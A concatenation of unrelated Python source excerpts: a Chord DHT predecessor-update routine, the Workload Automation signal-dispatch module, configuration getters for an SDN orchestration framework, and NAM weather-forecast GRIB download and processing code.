self.existing_node.node_info.predecessor_info = node_info.get_partial_deepcopy()
ChordUtil.dprint("check_predecessor_1," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(self.existing_node.node_info.successor_info_list[0]))
ChordUtil.dprint("check_predecessor_2," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(self.existing_node.node_info.successor_info_list[0]))
# この時点で認識している predecessor がノードダウンしていないかチェックする
# is_pred_alived = ChordUtil.is_node_alive(cast('NodeInfo', self.existing_node.node_info.predecessor_info).address_str)
ret = ChordUtil.is_node_alive(cast('NodeInfo', self.existing_node.node_info.predecessor_info).address_str)
if (ret.is_ok):
is_pred_alived : bool = cast(bool, ret.result)
else: # ret.err_code == ErrorCode.InternalControlFlowException_CODE
is_pred_alived : bool = False
if is_pred_alived:
distance_check = ChordUtil.calc_distance_between_nodes_left_mawari(self.existing_node.node_info.node_id, node_info.node_id)
distance_cur = ChordUtil.calc_distance_between_nodes_left_mawari(self.existing_node.node_info.node_id,
cast('NodeInfo',self.existing_node.node_info.predecessor_info).node_id)
# 確認を求められたノードの方が現在の predecessor より predecessorらしければ
# 経路表の情報を更新する
if distance_check < distance_cur:
self.existing_node.node_info.predecessor_info = node_info.get_partial_deepcopy()
ChordUtil.dprint("check_predecessor_3," + ChordUtil.gen_debug_str_of_node(self.existing_node.node_info) + ","
+ ChordUtil.gen_debug_str_of_node(self.existing_node.node_info.successor_info_list[0]) + ","
+ ChordUtil.gen_debug_str_of_node(self.existing_node.node_info.predecessor_info))
else: # predecessorがダウンしていた場合は無条件でチェックを求められたノードをpredecessorに設定する
self.existing_node.node_info.predecessor_info = node_info.get_partial_deepcopy()
return | |
# Copyright 2013-2018 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
This module wraps louie signalling mechanism. It relies on modified version of louie
that has prioritization added to handler invocation.
"""
import sys
import logging
from contextlib import contextmanager
from louie import dispatcher, saferef # pylint: disable=wrong-import-order
from louie.dispatcher import _remove_receiver
import wrapt
from wa.utils.types import prioritylist, enum
logger = logging.getLogger('signal')
class Signal(object):
"""
This class implements the signals to be used for notifiying callbacks
registered to respond to different states and stages of the execution of workload
automation.
"""
def __init__(self, name, description='no description', invert_priority=False):
"""
Instantiates a Signal.
:param name: name is the identifier of the Signal object. Signal instances with
the same name refer to the same execution stage/stage.
:param invert_priority: boolean parameter that determines whether multiple
callbacks for the same signal should be
ordered with ascending or descending
priorities. Typically this flag should be
set to True if the Signal is triggered
AFTER an a state/stage has been reached.
That way callbacks with high priorities
will be called right after the event has
occured.
"""
self.name = name
self.description = description
self.invert_priority = invert_priority
def __str__(self):
return self.name
__repr__ = __str__
def __hash__(self):
return id(self.name)
# Signals associated with run-related events
RUN_STARTED = Signal('run-started', 'sent at the beginning of the run')
RUN_INITIALIZED = Signal('run-initialized', 'set after the run has been initialized')
RUN_ABORTED = Signal('run-aborted', 'set when the run has been aborted due to a keyboard interrupt')
RUN_FAILED = Signal('run-failed', 'set if the run has failed to complete all jobs.')
RUN_FINALIZED = Signal('run-finalized', 'set after the run has been finalized')
RUN_COMPLETED = Signal('run-completed', 'set upon completion of the run (regardless of whether or not it has failed')
# Signals associated with job-related events
JOB_STARTED = Signal('job-started', 'set when a a new job has been started')
JOB_ABORTED = Signal('job-aborted',
description='''
sent if a job has been aborted due to a keyboard interrupt.
.. note:: While the status of every job that has not had a
chance to run due to being interrupted will be
set to "ABORTED", this signal will only be sent
for the job that was actually running at the
time.
''')
JOB_FAILED = Signal('job-failed', description='set if the job has failed')
JOB_RESTARTED = Signal('job-restarted')
JOB_COMPLETED = Signal('job-completed')
# Signals associated with particular stages of workload execution
BEFORE_WORKLOAD_INITIALIZED = Signal('before-workload-initialized',
invert_priority=True)
SUCCESSFUL_WORKLOAD_INITIALIZED = Signal('successful-workload-initialized')
AFTER_WORKLOAD_INITIALIZED = Signal('after-workload-initialized')
BEFORE_WORKLOAD_SETUP = Signal('before-workload-setup', invert_priority=True)
SUCCESSFUL_WORKLOAD_SETUP = Signal('successful-workload-setup')
AFTER_WORKLOAD_SETUP = Signal('after-workload-setup')
BEFORE_WORKLOAD_EXECUTION = Signal('before-workload-execution', invert_priority=True)
SUCCESSFUL_WORKLOAD_EXECUTION = Signal('successful-workload-execution')
AFTER_WORKLOAD_EXECUTION = Signal('after-workload-execution')
BEFORE_WORKLOAD_RESULT_EXTRACTION = Signal('before-workload-result-extracton', invert_priority=True)
SUCCESSFUL_WORKLOAD_RESULT_EXTRACTION = Signal('successful-workload-result-extracton')
AFTER_WORKLOAD_RESULT_EXTRACTION = Signal('after-workload-result-extracton')
BEFORE_WORKLOAD_OUTPUT_UPDATE = Signal('before-workload-output-update',
invert_priority=True)
SUCCESSFUL_WORKLOAD_OUTPUT_UPDATE = Signal('successful-workload-output-update')
AFTER_WORKLOAD_OUTPUT_UPDATE = Signal('after-workload-output-update')
BEFORE_WORKLOAD_TEARDOWN = Signal('before-workload-teardown', invert_priority=True)
SUCCESSFUL_WORKLOAD_TEARDOWN = Signal('successful-workload-teardown')
AFTER_WORKLOAD_TEARDOWN = Signal('after-workload-teardown')
BEFORE_WORKLOAD_FINALIZED = Signal('before-workload-finalized', invert_priority=True)
SUCCESSFUL_WORKLOAD_FINALIZED = Signal('successful-workload-finalized')
AFTER_WORKLOAD_FINALIZED = Signal('after-workload-finalized')
# Signals indicating exceptional conditions
ERROR_LOGGED = Signal('error-logged')
WARNING_LOGGED = Signal('warning-logged')
# These are paired events -- if the before_event is sent, the after_ signal is
# guaranteed to also be sent. In particular, the after_ signals will be sent
# even if there is an error, so you cannot assume in the handler that the
# device has booted successfully. In most cases, you should instead use the
# non-paired signals below.
BEFORE_RUN_INIT = Signal('before-run-init', invert_priority=True)
SUCCESSFUL_RUN_INIT = Signal('successful-run-init')
AFTER_RUN_INIT = Signal('after-run-init')
BEFORE_JOB = Signal('before-job', invert_priority=True)
SUCCESSFUL_JOB = Signal('successful-job')
AFTER_JOB = Signal('after-job')
BEFORE_JOB_QUEUE_EXECUTION = Signal('before-job-queue-execution', invert_priority=True)
SUCCESSFUL_JOB_QUEUE_EXECUTION = Signal('successful-job-queue-execution')
AFTER_JOB_QUEUE_EXECUTION = Signal('after-job-queue-execution')
BEFORE_JOB_TARGET_CONFIG = Signal('before-job-target-config', invert_priority=True)
SUCCESSFUL_JOB_TARGET_CONFIG = Signal('successful-job-target-config')
AFTER_JOB_TARGET_CONFIG = Signal('after-job-target-config')
BEFORE_JOB_OUTPUT_PROCESSED = Signal('before-job-output-processed',
invert_priority=True)
SUCCESSFUL_JOB_OUTPUT_PROCESSED = Signal('successful-job-output-processed')
AFTER_JOB_OUTPUT_PROCESSED = Signal('after-job-output-processed')
BEFORE_FLASHING = Signal('before-flashing', invert_priority=True)
SUCCESSFUL_FLASHING = Signal('successful-flashing')
AFTER_FLASHING = Signal('after-flashing')
BEFORE_REBOOT = Signal('before-reboot', invert_priority=True)
SUCCESSFUL_REBOOT = Signal('successful-reboot')
AFTER_REBOOT = Signal('after-reboot')
BEFORE_TARGET_CONNECT = Signal('before-target-connect', invert_priority=True)
SUCCESSFUL_TARGET_CONNECT = Signal('successful-target-connect')
AFTER_TARGET_CONNECT = Signal('after-target-connect')
BEFORE_TARGET_DISCONNECT = Signal('before-target-disconnect', invert_priority=True)
SUCCESSFUL_TARGET_DISCONNECT = Signal('successful-target-disconnect')
AFTER_TARGET_DISCONNECT = Signal('after-target-disconnect')
BEFORE_RUN_OUTPUT_PROCESSED = Signal(
'before-run-output-processed', invert_priority=True)
SUCCESSFUL_RUN_OUTPUT_PROCESSED = Signal(
'successful-run-output-processed')
AFTER_RUN_OUTPUT_PROCESSED = Signal(
'after-run-output-processed')
CallbackPriority = enum(['extremely_low', 'very_low', 'low', 'normal',
'high', 'very_high', 'extremely_high'], -30, 10)
class _prioritylist_wrapper(prioritylist):
"""
This adds a NOP append() method so that when louie invokes it to add the
handler to receivers, nothing will happen; the handler is actually added inside
the connect() below according to priority, before louie's connect() gets invoked.
"""
def append(self, *args, **kwargs):
pass
def connect(handler, signal, sender=dispatcher.Any, priority=0):
"""
Connects a callback to a signal, so that the callback will be automatically invoked
when that signal is sent.
Parameters:
:handler: This can be any callable that that takes the right arguments for
the signal. For most signals this means a single argument that
will be an ``ExecutionContext`` instance. But please see documentation
for individual signals in the :ref:`signals reference <instruments_method_map>`.
:signal: The signal to which the handler will be subscribed. Please see
:ref:`signals reference <instruments_method_map>` for the list of standard WA
signals.
.. note:: There is nothing that prevents instruments from sending their
own signals that are not part of the standard set. However the signal
must always be an :class:`wa.core.signal.Signal` instance.
:sender: The handler will be invoked only for the signals emitted by this sender. By
default, this is set to :class:`louie.dispatcher.Any`, so the handler will
be invoked for signals from any sender.
:priority: An integer (positive or negative) the specifies the priority of the handler.
Handlers with higher priority will be called before handlers with lower
priority. The call order of handlers with the same priority is not specified.
Defaults to 0.
.. note:: Priorities for some signals are inverted (so highest priority
handlers get executed last). Please see :ref:`signals reference <instruments_method_map>`
for details.
"""
logger.debug('Connecting {} to {}({}) with priority {}'.format(handler, signal, sender, priority))
if getattr(signal, 'invert_priority', False):
priority = -priority
senderkey = id(sender)
if senderkey in dispatcher.connections:
signals = dispatcher.connections[senderkey]
else:
dispatcher.connections[senderkey] = signals = {}
if signal in signals:
receivers = signals[signal]
else:
receivers = signals[signal] = _prioritylist_wrapper()
dispatcher.connect(handler, signal, sender)
receivers.add(saferef.safe_ref(handler, on_delete=_remove_receiver), priority)
def disconnect(handler, signal, sender=dispatcher.Any):
"""
Disconnect a previously connected handler form the specified signal, optionally, only
for the specified sender.
Parameters:
:handler: The callback to be disconnected.
:signal: The signal the handler is to be disconnected form. It will
be an :class:`wa.core.signal.Signal` instance.
:sender: If specified, the handler will only be disconnected from the signal
sent by this sender.
"""
logger.debug('Disconnecting {} from {}({})'.format(handler, signal, sender))
dispatcher.disconnect(handler, signal, sender)
def send(signal, sender=dispatcher.Anonymous, *args, **kwargs):
"""
Sends a signal, causing connected handlers to be invoked.
Parameters:
:signal: Signal to be sent. This must be an instance of :class:`wa.core.signal.Signal`
or its subclasses.
:sender: The sender of the signal (typically, this would be ``self``). Some handlers may only
be subscribed to signals from a particular sender.
The rest of the parameters will be passed on as aruments to the handler.
"""
logger.debug('Sending {} from {}'.format(signal, sender))
return dispatcher.send(signal, sender, *args, **kwargs)
# This will normally be set to log_error() by init_logging(); see wa.utils.log
# Done this way to prevent a circular import dependency.
log_error_func = logger.error
def safe_send(signal, sender=dispatcher.Anonymous,
propagate=None, *args, **kwargs):
"""
Same as ``send``, except this will catch and log all exceptions raised
by handlers, except those specified in ``propagate`` argument (defaults
to just ``[KeyboardInterrupt]``).
"""
if propagate is None:
propagate = [KeyboardInterrupt]
try:
logger.debug('Safe-sending {} from {}'.format(signal, sender))
send(signal, sender, *args, **kwargs)
except Exception as e: # pylint: disable=broad-except
if any(isinstance(e, p) for p in propagate):
raise e
log_error_func(e)
@contextmanager
def wrap(signal_name, sender=dispatcher.Anonymous, *args, **kwargs): # pylint: disable=keyword-arg-before-vararg
"""Wraps the suite in before/after signals, ensuring
that after signal is always sent."""
safe = kwargs.pop('safe', False)
signal_name = signal_name.upper().replace('-', '_')
send_func = safe_send if safe else send
try:
before_signal = globals()['BEFORE_' + signal_name]
success_signal = globals()['SUCCESSFUL_' + signal_name]
after_signal = globals()['AFTER_' + signal_name]
except KeyError:
raise ValueError('Invalid wrapped signal name: {}'.format(signal_name))
try:
send_func(before_signal, sender, *args, **kwargs)
yield
send_func(success_signal, sender, *args, **kwargs)
finally:
_, exc, _ = sys.exc_info()
if exc:
log_error_func(exc)
send_func(after_signal, sender, *args, **kwargs)
def wrapped(signal_name, sender=dispatcher.Anonymous, safe=False):
"""A decorator for wrapping function in signal dispatch."""
@wrapt.decorator
def signal_wrapped(wrapped_func, _, args, kwargs):
def signal_wrapper(*args, **kwargs):
with wrap(signal_name, sender, safe):
return wrapped_func(*args, **kwargs)
return signal_wrapper(*args, **kwargs)
| |
mapping process is enabled for the ``layer`` or not.
:param layer: layer name
:type layer: str
:return: enabled value (default: True)
:rtype: bool
"""
try:
return self.__config[layer]['PROCESSOR']['enabled']
except KeyError:
return False
def get_threaded (self, layer):
"""
Return with the value if the mapping strategy is needed to run in
separated thread or not. If value is not defined: return False.
:param layer: layer name
:type layer: str
:return: threading value
:rtype: bool
"""
try:
return self.__config[layer]['STRATEGY']['THREADED']
except KeyError:
return False
##############################################################################
# REST_API layer getters
##############################################################################
def get_rest_api_resource_class (self, layer):
"""
"""
try:
return getattr(importlib.import_module(
self.__config['REST-API']['resources'][layer]['module']),
self.__config['REST-API']['resources'][layer]['class'], None)
except KeyError:
return None
def get_rest_api_prefix (self):
try:
return self.__config['REST-API']['prefix']
except KeyError:
return None
def get_rest_api_config (self, layer):
try:
cfg = self.__config['REST-API']['resources'][layer].copy()
del cfg['module']
del cfg['class']
return cfg
except KeyError:
return {}
def get_rest_api_host (self):
try:
return self.__config['REST-API'].get('host')
except KeyError:
return None
def get_rest_api_port (self):
try:
return self.__config['REST-API'].get('port')
except KeyError:
return None
def get_rest_api_resource_params (self, layer):
"""
Return the Cf-Or API params for agent request handler.
:return: params
:rtype: dict
"""
try:
return self.__config['REST-API']['resources'][layer]
except KeyError:
return {}
def get_rest_api_user(self):
try:
return self.__config['REST-API'].get('auth_user')
except KeyError:
return None
def get_rest_api_secret(self):
try:
return self.__config['REST-API'].get('auth_secret')
except KeyError:
return None
##############################################################################
# SERVICE layer getters
##############################################################################
def get_sas_request_delay (self):
"""
Return the default delay value for service request parsing from file.
:return: delay
:rtype: int
"""
try:
return int(
self.__config[SERVICE]['SCHEDULED_SERVICE_REQUEST_DELAY'])
except (KeyError, ValueError):
return 0
##############################################################################
# Virtualizer getters
##############################################################################
def get_api_virtualizer (self, layer):
"""
Return the type of the assigned Virtualizer.
:return: type of the Virtualizer as in :any:`VirtualizerManager`
:rtype: str
"""
try:
return self.__config['REST-API']['resources'][layer]['virtualizer_type']
except (KeyError, AttributeError, TypeError):
return None
def get_virtualizer_params (self, layer):
try:
return self.__config['REST-API']['resources'][layer][
'virtualizer_params']
except KeyError:
return {}
##############################################################################
# ADAPTATION layer getters
##############################################################################
def get_vnfm_enabled (self):
"""
Return whether the VNFM component tis enabled.
:return: VNFM is enabled or not
:rtype: bool
"""
try:
return self.__config[ADAPT]['VNFM']['enabled']
except KeyError:
return False
def get_vnfm_config (self):
"""
Return the VNFM external component configuration.
:return: VNFM config
:rtype: dict
"""
try:
params = self.__config[ADAPT]['VNFM'].copy()
return params
except KeyError:
return {}
def get_callback_config (self):
"""
Return the common callback configuration for :class:`CallbackManager`.
:return: callback manager config
:rtype: dict
"""
try:
return self.__config[ADAPT]['CALLBACK'].copy()
except KeyError:
return {}
def get_component (self, component, parent=None):
"""
Return with the class of the adaptation component.
:param component: component name
:type component: str
:param parent: define the parent of the actual component's configuration
:type parent: dict
:return: component class
"""
try:
comp = self.__config[ADAPT][component] if parent is None \
else parent[component]
return getattr(importlib.import_module(comp['module']), comp['class'])
except KeyError:
return None
def get_component_params (self, component, parent=None):
"""
Return with the initial parameters of the given component defined in CONFIG.
The param's name must be identical with the attribute name of the component
constructor.
:param component: component name
:type component: str
:param parent: define the parent of the actual component's configuration
:type parent: dict
:return: initial params
:rtype: dict
"""
try:
params = self.__config[ADAPT][component] \
if parent is None else parent[component]
except KeyError:
return {}
try:
# FIXME - what if there are no module and class???
params = params.copy()
del params['module']
del params['class']
except KeyError:
pass
return params
def get_managers (self):
"""
Return the default DomainManagers for initialization on start.
:return: list of :any:`AbstractDomainManager` names
:rtype: list
"""
try:
return self.__config[ADAPT]['MANAGERS']
except KeyError:
return ()
def get_manager_by_domain (self, domain):
"""
Return the manager configuration belongs to the given domain.
:param domain: domain name
:type domain: str
:return: domain manager config
:rtype: dict
"""
if domain in self.__config[ADAPT]:
return self.__config[ADAPT][domain]
for mgr in self.__config[ADAPT]:
if type(mgr) is not dict:
continue
if mgr.get('domain_name', None) == domain:
return mgr
def get_internal_manager (self):
"""
Return with the Manager class which is detected as the Manager of the
locally emulated Mininet-based network.
Based on the IS_INTERNAL_MANAGER attribute of the defined DomainManager
classes in the global config.
:return: local manager name(s)
:rtype: dict
"""
internal_mgrs = []
for item in self.__config[ADAPT].itervalues():
if isinstance(item, dict) and 'module' in item and 'class' in item:
try:
mgr_class = getattr(importlib.import_module(item['module']),
item['class'])
if mgr_class.IS_INTERNAL_MANAGER:
internal_mgrs.append(
item['domain_name'] if 'domain_name' in item else
mgr_class.DEFAULT_DOMAIN_NAME)
except (KeyError, AttributeError, TypeError):
return None
return internal_mgrs if internal_mgrs else None
def get_external_managers (self):
"""
Return with Manager classes which is detected as external managers.
Based on the IS_EXTERNAL_MANAGER attribute of the defined DomainManager
classes in the global config.
:return: external manager name(s)
:rtype: dict
"""
external_mgrs = []
for item in self.__config[ADAPT].itervalues():
if isinstance(item, dict) and 'module' in item and 'class' in item:
try:
mgr_class = getattr(importlib.import_module(item['module']),
item['class'])
if mgr_class.IS_EXTERNAL_MANAGER:
external_mgrs.append(
item['domain_name'] if 'domain_name' in item else
mgr_class.DEFAULT_DOMAIN_NAME)
except (KeyError, AttributeError, TypeError):
return None
return external_mgrs if external_mgrs else None
def reset_domains_after_shutdown (self):
"""
Return with the shutdown strategy to reset domain or not.
:return: reset domain after shutdown or not (default: False)
:rtype: bool
"""
try:
return self.__config[ADAPT]['deployment'][
'RESET-DOMAINS-AFTER-SHUTDOWN']
except KeyError:
return True
def clear_domains_after_shutdown (self):
"""
Return with the shutdown strategy to clear domain or not.
:return: clear domain after shutdown or not (default: True)
:rtype: bool
"""
try:
return self.__config[ADAPT]['deployment'][
'CLEAR-DOMAINS-AFTER-SHUTDOWN']
except KeyError:
return True
def reset_domains_before_install (self):
"""
Return with the pre-deploy strategy to reset domain or not.
:return: reset domain before install or not (default: False)
:rtype: bool
"""
try:
return self.__config[ADAPT]['deployment'][
'RESET-DOMAINS-BEFORE-INSTALL']
except KeyError:
return False
def rollback_on_failure (self):
"""
:return: Return whether rollback mode is enabled.
:rtype: bool
"""
try:
return self.__config[ADAPT]['deployment']['ROLLBACK-ON-FAILURE']
except KeyError:
return False
def domain_deploy_delay (self):
"""
:return: Return explicit delay value injected before deployment.
:rtype: int
"""
try:
return self.__config[ADAPT]['deployment']['DOMAIN-DEPLOY-DELAY']
except KeyError:
return 0
def flowrule_stitching (self):
try:
return self.__config[ADAPT]['deployment'][
'ENABLE-FLOWRULE-STITCHING']
except KeyError:
return True
def use_remerge_update_strategy (self):
"""
Return True if the re-merge update strategy is enabled in DoV updating
instead of using the straightforward step-by-step updating.
:return: re-merge strategy is enabled or not (default: True)
:rtype: bool
"""
try:
return self.__config[ADAPT]['DOV']['USE-REMERGE-UPDATE-STRATEGY']
except KeyError:
return True
def use_status_based_update (self):
"""
Return True if the status based update strategy is enabled.
This approach update DoV as a first step and use element status to update
the domain.
:return: status update strategy is enabled or not (default: False)
:rtype: bool
"""
try:
return self.__config[ADAPT]['DOV']['USE-STATUS-BASED-UPDATE']
except KeyError:
return False
def ensure_unique_bisbis_id (self):
"""
Return with the ID generations strategy for nodes.
If it is set, id of nodes will be generated with the domain name as a
postfix to ensure unique id globally.
:return: id generation strategy (default: False)
:rtype: bool
"""
try:
return self.__config[ADAPT]['DOV']['ENSURE-UNIQUE-BiSBiS-ID']
except KeyError:
return False
def ensure_unique_vnf_id (self):
"""
Return with the ID generations strategy for VNFs.
If it is set, id of nodes will be generated with the container BiSBiS node
id as a postfix to ensure unique id globally.
:return: id generation strategy (default: False)
:rtype: bool
"""
try:
return self.__config[ADAPT]['DOV']['ENSURE-UNIQUE-VNF-ID']
except KeyError:
return False
def one_step_update (self):
"""
:return: Return whether on-step-update is enabled.
:rtype: bool
"""
try:
return self.__config[ADAPT]['DOV']['ONE-STEP-UPDATE']
except KeyError:
return True
def no_poll_during_deployment (self):
"""
:return: Return whether polling is disabled during service deployment
:rtype: bool
"""
try:
return self.__config[ADAPT]['DOV']['NO-POLL-DURING-DEPLOYMENT']
except KeyError:
return True
def get_sdn_topology (self):
"""
Return the path of the SDN topology config file.
:return: path of topology config file
:rtype: str
"""
try:
# Project root dir relative to this module which is/must be under root
# util/escape/ext/pox/root
return os.path.abspath(
os.path.join(self.get_project_root_dir(),
self.__config[ADAPT]['SDN']['TOPOLOGY']['path']))
except KeyError:
return None
##############################################################################
# INFRASTRUCTURE layer getters
##############################################################################
def get_mn_network_opts (self):
"""
Return the optional Mininet parameters for initiation.
:return: optional constructor params (default: empty dict)
:rtype: dict
"""
try:
mn_opts = self.__config[INFR]['NETWORK-OPTS']
return mn_opts if mn_opts is not None else {}
except KeyError:
return {}
def get_mininet_topology (self):
"""
Return the Mininet topology class.
:return: topo class
"""
try:
# Project root dir relative to this module which is/must be under pox/ext
return os.path.abspath(os.path.join(self.get_project_root_dir(),
self.__config[INFR]['TOPO']))
except KeyError:
return None
def get_fallback_topology (self):
| |
includes both system and HTTP errors.
# Retry with exponential backoff.
logger.warning(err)
path.unlink()
if i + 1 == max_tries:
logger.error(f'download of {path.name} failed, giving up')
raise err
else:
delay = 2**i
logger.warning(f'download of {path.name} failed, retrying in {delay}s')
sleep(delay)
continue
except (Exception, SystemExit, KeyboardInterrupt) as err:
# Partial files should be deleted
# SystemExit and KeyboardInterrupt must be caught explicitly.
path.unlink()
raise err
logger.info(f'reading {path}')
return xr.open_dataset(path, engine='pynio')
def _process_grib(ds, reftime, forecast):
'''Process a forecast loaded from GRIB.
GRIB files contain a forecast for a specific forecast hour at a specific
reftime, including all NAM data variables for the entire NAM 218 grid.
This method trims the dataset to the subset of variables and geographic
region that we are interested in, normalizes variable names and shapes
to a more consistent format, and adds additional metadata.
Arguments:
ds (xarray.Dataset):
The dataset to process.
reftime (timestamp):
The reference time associated with the dataset.
forecast (int):
The forecast hour associated with the dataset.
Returns:
xarray.Dataset:
A processed dataset.
'''
features = {
# Data variables
'DLWRF_P0_L1_GLC0': 'DLWRF_SFC', 'DSWRF_P0_L1_GLC0': 'DSWRF_SFC',
'PRES_P0_L1_GLC0': 'PRES_SFC',
'PRES_P0_L6_GLC0': 'PRES_MWSL', 'PRES_P0_L7_GLC0': 'PRES_TRO',
'TCDC_P0_L200_GLC0': 'TCC_EATM', 'TMP_P0_2L108_GLC0': 'TMP_SPDY',
'TMP_P0_L1_GLC0': 'TMP_SFC', 'TMP_P0_L100_GLC0': 'TMP_ISBL',
'TMP_P0_L103_GLC0': 'TMP_HTGL', 'TMP_P0_L7_GLC0': 'TMP_TRO',
'RH_P0_2L104_GLC0': 'RH_SIGY', 'RH_P0_2L108_GLC0': 'RH_SPDY',
'RH_P0_L100_GLC0': 'RH_ISBL',
'RH_P0_L4_GLC0': 'RH_0DEG', 'UGRD_P0_2L108_GLC0': 'UGRD_SPDY',
'UGRD_P0_L100_GLC0': 'UGRD_ISBL', 'UGRD_P0_L103_GLC0': 'UGRD_HTGL',
'UGRD_P0_L220_GLC0': 'UGRD_TOA', 'UGRD_P0_L6_GLC0': 'UGRD_MWSL',
'UGRD_P0_L7_GLC0': 'UGRD_TRO', 'VGRD_P0_2L108_GLC0': 'VGRD_SPDY',
'VGRD_P0_L100_GLC0': 'VGRD_ISBL', 'VGRD_P0_L103_GLC0': 'VGRD_HTGL',
'VGRD_P0_L220_GLC0': 'VGRD_TOA', 'VGRD_P0_L6_GLC0': 'VGRD_MWSL',
'VGRD_P0_L7_GLC0': 'VGRD_TRO', 'VIS_P0_L1_GLC0': 'VIS_SFC',
'LHTFL_P0_L1_GLC0': 'LHTFL_SFC', 'SHTFL_P0_L1_GLC0': 'SHTFL_SFC',
'REFC_P0_L200_GLC0': 'REFC_EATM', 'REFD_P0_L103_GLC0': 'REFD_HTGL',
'REFD_P0_L105_GLC0': 'REFD_HYBL', 'VVEL_P0_L100_GLC0': 'VVEL_ISBL',
'HGT_P0_L1_GLC0': 'HGT_SFC', 'HGT_P0_L100_GLC0': 'HGT_ISBL',
'HGT_P0_L2_GLC0': 'HGT_CBL', 'HGT_P0_L220_GLC0': 'HGT_TOA',
'HGT_P0_L245_GLC0': 'HGT_LLTW', 'HGT_P0_L4_GLC0': 'HGT_0DEG',
'PWAT_P0_L200_GLC0': 'PWAT_EATM', 'TKE_P0_L100_GLC0': 'TKE_ISBL',
# Coordinate variables
'lv_HTGL1': 'z_HTGL1', 'lv_HTGL3': 'z_HTGL2',
'lv_HTGL6': 'z_HTGL3', 'lv_ISBL0': 'z_ISBL',
'lv_SPDL2': 'z_SPDY',
'xgrid_0': 'x', 'ygrid_0': 'y',
'gridlat_0': 'lat', 'gridlon_0': 'lon',
}
unwanted = [k for k in ds.variables.keys() if k not in features]
ds = ds.drop(unwanted)
ds = ds.rename(features)
# Subset the geographic region to a square area centered around Macon, GA.
ds = ds.isel(y=slice(63, 223, None), x=slice(355, 515, None))
# Free memory from unused features and areas.
ds = ds.copy(deep=True)
# Compute the coordinates for x and y
x, y = proj_coords(ds.lat.data, ds.lon.data)
x, y = x[0,:], y[:,0]
ds = ds.assign_coords(x=x, y=y)
# Add a z dimension to variables that don't have one.
for v in ds.data_vars:
if ds[v].dims == ('y', 'x'):
layer = ds[v].name.split('_')[1]
ds[v] = ds[v].expand_dims(f'z_{layer}')
# Create reftime and forecast dimensions.
# Both are stored as integers with appropriate units.
# The reftime dimension is hours since the Unix epoch (1970-01-01 00:00).
# The forecast dimension is hours since the reftime.
reftime = apollo.Timestamp(reftime).floor('6h')
epoch = apollo.Timestamp('1970-01-01 00:00')
delta_seconds = int((reftime - epoch).total_seconds())
delta_hours = delta_seconds // 60 // 60
ds = ds.assign_coords(
reftime=delta_hours,
forecast=forecast,
)
for v in ds.data_vars:
ds[v] = ds[v].expand_dims(('reftime', 'forecast'))
# Fix the z_SPDY coordinate.
# The layer is defined in term of bounds above and below.
# The dataset expresses this as three coordinates: the index, lower bound, and upper bound.
# We kept the index and now replace the values to be the upper bound, in Pascals
ds['z_SPDY'] = ds['z_SPDY'].assign_attrs(
comment='The values give the upper bound of the layer, the lower bound is 3000 Pa less',
)
ds['z_SPDY'].data = np.array([3000, 6000, 9000, 12000, 15000, 18000])
# Set metadata according to CF conventions
# http://cfconventions.org/Data/cf-conventions/cf-conventions-1.7/cf-conventions.html
metadata = {
# Data Variables
# TODO: The wind directions may be backwards, should be confirmed with NCEP.
'DLWRF_SFC': {'standard_name':'downwelling_longwave_flux', 'units':'W/m^2'},
'DSWRF_SFC': {'standard_name':'downwelling_shortwave_flux', 'units':'W/m^2'},
'HGT_0DEG': {'standard_name':'geopotential_height', 'units':'gpm'},
'HGT_CBL': {'standard_name':'geopotential_height', 'units':'gpm'},
'HGT_ISBL': {'standard_name':'geopotential_height', 'units':'gpm'},
'HGT_LLTW': {'standard_name':'geopotential_height', 'units':'gpm'},
'HGT_TOA': {'standard_name':'geopotential_height', 'units':'gpm'},
'HGT_SFC': {'standard_name':'geopotential_height', 'units':'gpm'},
'PRES_MWSL': {'standard_name':'air_pressure', 'units':'Pa'},
'PRES_SFC': {'standard_name':'air_pressure', 'units':'Pa'},
'PRES_TRO': {'standard_name':'air_pressure', 'units':'Pa'},
'PWAT_EATM': {'standard_name':'atmosphere_water_vapor_content', 'units':'kg/m^2'},
'REFC_EATM': {'standard_name':'equivalent_reflectivity_factor', 'units':'dBZ'},
'REFD_HTGL': {'standard_name':'equivalent_reflectivity_factor', 'units':'dBZ'},
'REFD_HYBL': {'standard_name':'equivalent_reflectivity_factor', 'units':'dBZ'},
'RH_0DEG': {'standard_name':'relative_humidity', 'units':'%'},
'RH_ISBL': {'standard_name':'relative_humidity', 'units':'%'},
'RH_SIGY': {'standard_name':'relative_humidity', 'units':'%'},
'RH_SPDY': {'standard_name':'relative_humidity', 'units':'%'},
'LHTFL_SFC': {'standard_name':'upward_latent_heat_flux', 'units':'W/m2'},
'SHTFL_SFC': {'standard_name':'upward_sensible_heat_flux', 'units':'W/m2'},
'TCC_EATM': {'standard_name':'cloud_area_fraction', 'units':'%'},
'TKE_ISBL': {'standard_name':'atmosphere_kinetic_energy_content', 'units':'J/kg'},
'TMP_HTGL': {'standard_name':'air_temperature', 'units':'K'},
'TMP_ISBL': {'standard_name':'air_temperature', 'units':'K'},
'TMP_SFC': {'standard_name':'air_temperature', 'units':'K'},
'TMP_SPDY': {'standard_name':'air_temperature', 'units':'K'},
'TMP_TRO': {'standard_name':'air_temperature', 'units':'K'},
'UGRD_HTGL': {'standard_name':'eastward_wind', 'units':'m/s'},
'UGRD_ISBL': {'standard_name':'eastward_wind', 'units':'m/s'},
'UGRD_MWSL': {'standard_name':'eastward_wind', 'units':'m/s'},
'UGRD_TOA': {'standard_name':'eastward_wind', 'units':'m/s'},
'UGRD_SPDY': {'standard_name':'eastward_wind', 'units':'m/s'},
'UGRD_TRO': {'standard_name':'eastward_wind', 'units':'m/s'},
'VGRD_HTGL': {'standard_name':'northward_wind', 'units':'m/s'},
'VGRD_ISBL': {'standard_name':'northward_wind', 'units':'m/s'},
'VGRD_MWSL': {'standard_name':'northward_wind', 'units':'m/s'},
'VGRD_TOA': {'standard_name':'northward_wind', 'units':'m/s'},
'VGRD_SPDY': {'standard_name':'northward_wind', 'units':'m/s'},
